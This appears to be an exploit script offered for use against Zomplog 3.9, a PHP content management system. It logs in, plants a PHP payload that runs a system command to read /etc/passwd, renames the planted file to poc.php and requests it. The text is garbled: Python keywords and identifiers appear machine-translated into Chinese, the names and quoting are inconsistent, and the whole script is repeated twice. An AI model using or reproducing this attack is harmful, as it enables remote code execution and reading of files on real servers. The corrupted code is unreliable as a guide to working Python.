#Exploit title: zomplog 3.9-远程代码执行(RCE)
#application: zomplog
#版本: v3.9
#BUGS: RCE
#Technology: PHP
#供应商URL: http://zomp.nl/ZOMPLOG/
#software link: http://zomp.nl/zomplog/downloads/ZOMPLOG/ZOMPLOG3.9.9.zip
#date of stud: 22.07.2023
#作者:MirabbasAğalarov
#Tested On: Linux
导入请求
#inputs
用户名=输入('username:')
密码=输入('密码:')
#urls
login_url='http://localhost/zimplitcms/zimplit.php?action=login'
payload_url='http://localhost/zimplitcms/zimplit.php?action=saveefile=zsettings.js'
rename_url='http://localhost/zimplitcms/zimplit.php?action=renameoldname=zsettings.jsnewname=poc.php'
poc_url='http://localhost/zimplitcms/poc.php'
#登录
session=requests.session()
login_data=f'lang=enusername={userName} password={password} sumpr=start=start!'
标题={
'cookie':'zsessionlang=en',
'content-type':'应用程序/x-www-form-urlencoded',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)
}
login_req=session.post(login_url,标头=标题,data=login_data)
如果login_req.status_code==200:
打印('登录OK')
其他:
打印('登录PREMLEM。')
出口()
#payload
payload_data='html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250 azmaxpiczoomh%2520%253D%2520%2522150%2522%2522%253b%2520%250AZMAXPICW%2520%253D%2520%2522800%25222222%2522%253b%253b%2520%2520%2520'2520'
phheaders={
'content-type':'应用程序/x-www-form-urlencoded',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)
}
payload_req=session.post(payload_url,标头=pheaders,data=payload_data)
#prename
rename_req=session.get(rename_url)
#poc
poc_req=session.get(poc_url)
打印(poc_req.text)
#Youtube POC视频-https://youtu.be/nn7hiegycfs
#application: zomplog
#版本: v3.9
#BUGS: RCE
#Technology: PHP
#供应商URL: http://zomp.nl/ZOMPLOG/
#software link: http://zomp.nl/zomplog/downloads/ZOMPLOG/ZOMPLOG3.9.9.zip
#date of stud: 22.07.2023
#作者:MirabbasAğalarov
#Tested On: Linux
导入请求
#inputs
用户名=输入('username:')
密码=输入('密码:')
#urls
login_url='http://localhost/zimplitcms/zimplit.php?action=login'
payload_url='http://localhost/zimplitcms/zimplit.php?action=saveefile=zsettings.js'
rename_url='http://localhost/zimplitcms/zimplit.php?action=renameoldname=zsettings.jsnewname=poc.php'
poc_url='http://localhost/zimplitcms/poc.php'
#登录
session=requests.session()
login_data=f'lang=enusername={userName} password={password} sumpr=start=start!'
标题={
'cookie':'zsessionlang=en',
'content-type':'应用程序/x-www-form-urlencoded',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)
}
login_req=session.post(login_url,标头=标题,data=login_data)
如果login_req.status_code==200:
打印('登录OK')
其他:
打印('登录PREMLEM。')
出口()
#payload
payload_data='html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250 azmaxpiczoomh%2520%253D%2520%2522150%2522%2522%253b%2520%250AZMAXPICW%2520%253D%2520%2522800%25222222%2522%253b%253b%2520%2520%2520'2520'
phheaders={
'content-type':'应用程序/x-www-form-urlencoded',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)
}
payload_req=session.post(payload_url,标头=pheaders,data=payload_data)
#prename
rename_req=session.get(rename_url)
#poc
poc_req=session.get(poc_url)
打印(poc_req.text)
#Youtube POC视频-https://youtu.be/nn7hiegycfs
